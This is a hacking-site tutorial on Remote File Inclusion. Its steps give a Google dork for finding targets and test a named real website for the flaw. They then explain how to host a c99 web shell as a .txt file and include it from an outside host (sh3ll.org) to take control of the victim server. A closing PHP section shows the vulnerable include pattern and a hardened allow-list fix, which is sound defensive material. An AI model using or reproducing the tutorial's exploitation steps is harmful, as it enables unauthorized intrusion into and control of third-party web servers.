
Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is a vulnerability in web applications, most often PHP scripts, that pass user-supplied input to a file-including function such as include() or require(). If the server allows URLs in those calls (in PHP, the allow_url_include setting together with allow_url_fopen), an attacker can point the parameter at a file hosted elsewhere and the target server will fetch and execute it as code. Nothing has to be uploaded to the target itself; the attacker's script is pulled in over HTTP.

Tutorial:

Step 1: Find candidate sites with a Google dork. Paste the following into Google:

inurl:index.php?page= 

Step 2: This lists pages that carry "index.php?page=" in their URL. To test whether a site is vulnerable to Remote File Inclusion, replace the parameter's value with a URL to a well-known page:

www.targetsite.com/index.php?page=http://www.Google.com

Take this site as the example: http://www.cbspk.com

So the example URL will become:

www.cbspk.com/v2/index.php?page=http://www.google.com

Step 3: If the Google homepage renders inside the target's page after you request that URL, the script is including the remote file and the site is vulnerable. If nothing appears, the site is most likely not vulnerable (allow_url_include is off by default in PHP 5.2 and later) and you should look for a different target. One caveat: if the script appends its own suffix such as .php to the parameter before including it, the plain URL fails because the request goes to a host that does not exist; retry with a trailing question mark (http://www.google.com/?) so the suffix becomes a harmless query string. In my case, after entering the above URL in the address bar, the Google homepage showed up, indicating that the site was vulnerable to this attack.

Step 4: Next, upload a web shell to gain access. The most common shells are c99 and GNY; I would use GNY. You can download the c99 shell from the link below:

Download Shell

Step 5: First upload the shell to a web host you control, such as viralhosts.com, 110mb.com or another free host. Save it with a .txt extension: the host must serve the file as plain text rather than run it, so that the vulnerable target receives the raw PHP source and executes it itself.

Here is how a hacker would then execute the shell to gain access.

Alternatively, you can point directly at a shell that is already hosted. Say the URL of the shell is http://www.sh3ll.org/c99.txt

Now request the following URL to gain access:

www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Don't forget to add the question mark (?) after .txt at the end of the URL, or the shell will not execute: if the script appends its own suffix (for example .php) to the parameter, the question mark turns that suffix into a query string that the shell's host ignores, whereas without it the request would go to c99.txt.php, which does not exist. Once the shell is included, its code runs on the target server with the privileges of the web server account, and you can read and write files, run commands and otherwise control the site through the shell's interface. :P
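The "index.php?page=" pattern the dork hunts for usually comes down to a few lines of PHP. The following is an added example, not code taken from cbspk.com or from any site or shell named on this page: a minimal vulnerable index.php of the shape the tutorial exploits, with comments showing what the tutorial's URLs turn into, beside a hardened version that maps the parameter to a fixed set of local files. The file names, the $pages allow-list and the pages/ directory are assumptions for illustration.

```php
<?php
// VULNERABLE: the shape of include that the "index.php?page=" dork finds.
// With allow_url_fopen=On and allow_url_include=On in php.ini, a URL in
// $_GET['page'] is fetched over HTTP and executed as PHP on this server.
//
// Because this script appends ".php" to the parameter:
//   ?page=http://www.google.com
//       -> include("http://www.google.com.php")        host does not resolve, nothing renders
//   ?page=http://www.google.com/?
//       -> include("http://www.google.com/?.php")      Google homepage renders: the test
//   ?page=http://www.sh3ll.org/c99.txt?
//       -> include("http://www.sh3ll.org/c99.txt?.php") the suffix becomes a query string,
//                                                       the host serves c99.txt as text and
//                                                       this server executes it as PHP
// A script that does include($_GET['page']) with no suffix is exploited the
// same way, and there the plain URL without "?" already works.
function render_vulnerable(): void
{
    $page = $_GET['page'] ?? 'home';
    include $page . '.php';
}

// HARDENED: never hand user input to include. The parameter is only a key
// into a fixed map of local files; anything else is a 404. Independently of
// the code, set allow_url_include=Off (and, unless you need it, allow_url_fopen=Off)
// in php.ini so that a bug elsewhere cannot pull code over HTTP. You can
// check the live values with:  php -i | grep allow_url
function render_hardened(): void
{
    $pages = [
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    $page = $_GET['page'] ?? 'home';
    if (!array_key_exists($page, $pages)) {
        http_response_code(404);
        exit('Not found');
    }
    include __DIR__ . '/pages/' . $pages[$page];
}

render_hardened();
```

The allow-list is the fix that matters: filtering out "http://" from the parameter is not enough, since the same include is also reachable with local paths, and PHP's other URL wrappers. With the hardened function in place, every URL in the tutorial above produces a 404 instead of a shell.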

Category: RFI | Added by: max_hacker (12.07.26)
WWW.GeniusHackers.NET © 2024